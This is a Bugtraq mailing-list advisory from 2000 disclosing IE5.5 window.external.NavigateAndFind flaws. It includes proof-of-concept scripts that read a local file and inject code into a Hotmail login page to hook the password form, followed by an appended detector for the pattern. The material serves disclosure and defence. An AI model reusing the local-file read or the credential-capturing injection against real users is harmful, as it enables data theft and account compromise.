Bugtraq mailing list archives

IE5.5 window.external.NavigateAndFind security vulnerability


From: Alp Sinan <alp () UK2 NET>
Date: Sat, 30 Sep 2000 18:49:41 -0000

Multiple security vulnerabilities were found in the
window.external.NavigateAndFind function in IE5.5.
After the most recent patches are applied, the
vulnerabilities seem to persist. Actually, there are no
current issues discussed on the Microsoft website.
Microsoft has been notified about the problem via
email. Until now, no response has appeared.
I wanted to inform security-concerned people about
the problem.

Vulnerability 1: The window.external.NavigateAndFind
function can access local files, provided that the local
file name and path are known.

The code (the I in the script tag replaced with
lowercase):

<A href="javascr!pt:LinkClicked()">Show local file's Content</A>
<SCRiPT>
function LinkClicked()
{
  b=window.open("file://C:/test.txt","local")
  setTimeout('Sniff()',1000);
}
function Sniff(){
  window.external.NavigateAndFind("javascript:alert(document.body.innerText);","b","local");
}
</SCRiPT>

Demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm


Vulnerability 2: The window.external.NavigateAndFind
function can access other windows' DOM.
Editing the opened window's content, and therefore code
injection, is possible.

The code:

<A href="javascript:LinkClicked()">Go to Hotmail </A>
<scrIpt>
function LinkClicked()
{
  a=window.open("http://lc2.law5.hotmail.passport.com/cgi-bin/login","new")
  setTimeout('Spoof()',20000);// you may modify the timeout....
}
function Spoof(){
  window.external.NavigateAndFind("javascript:document.write(''+document.body.outerHTML+'<scrIpt>document.passwordform.onsubmit=ShowPass;function ShowPass(){alert(\"Your Password is:  \n \"+document.passwordform.passwd.value)};window.focus();</sc'+'rIpt>');alert('The code has been injected right now.');","a","new");
}
</scrIpt>

Demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm

Vulnerability 3: IE5.5 can execute the JavaScript or
VBScript content of plain text files.

Demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm

Precautions or workarounds might be disabling
JavaScript or using caution while clicking links in
untrusted web pages as well as popup windows.

Alp Sinan
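
Added example, not part of the original post and not the author's code: a content-filter style check that flags markup passing a script-scheme URL as the first argument of window.external.NavigateAndFind, the pattern both proofs of concept above share. The function names, the sample strings and the inclusion of vbscript: are assumptions made for this illustration.

```javascript
// Added example, not from the original post.
// Script-running URL schemes. The post demonstrates javascript: only;
// vbscript: is included here as an assumption about the same vector.
const SCRIPT_SCHEMES = ["javascript", "vbscript"];

// Constructed samples: a call wrapped the way the e-mail wraps it, and a
// benign search-style call with an ordinary http URL.
const SAMPLE_WRAPPED =
  'function f(){\n window.external.NavigateAndFind\n("java\tscript:void(0);","b","local");\n}';
const SAMPLE_BENIGN =
  'window.external.NavigateAndFind("http://example.com/","term","_main");';

// Remove whitespace and control characters and lowercase the text, so line
// wraps, padding and case changes cannot hide the call or the scheme.
function squash(text) {
  return text.replace(/[\s\u0000-\u001f]+/g, "").toLowerCase();
}

// Return one finding per NavigateAndFind call whose first argument is a
// string literal beginning with a script scheme. Offsets refer to the
// squashed text, not the original markup.
function findNavigateAndFindAbuse(html) {
  const flat = squash(html);
  const findings = [];
  const call = /navigateandfind\((["'])/g;
  let m;
  while ((m = call.exec(flat)) !== null) {
    const argStart = call.lastIndex; // first character inside the quotes
    const scheme = SCRIPT_SCHEMES.find((s) => flat.startsWith(s + ":", argStart));
    if (scheme) {
      findings.push({ offset: m.index, scheme, snippet: flat.slice(m.index, m.index + 60) });
    }
  }
  return findings;
}

console.log(findNavigateAndFindAbuse(SAMPLE_WRAPPED));
console.log(findNavigateAndFindAbuse(SAMPLE_BENIGN));
```

The check only sees string literals: a first argument built by concatenation, held in a variable or HTML-entity encoded is not caught, so it complements the workarounds listed in the post and does not replace them.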





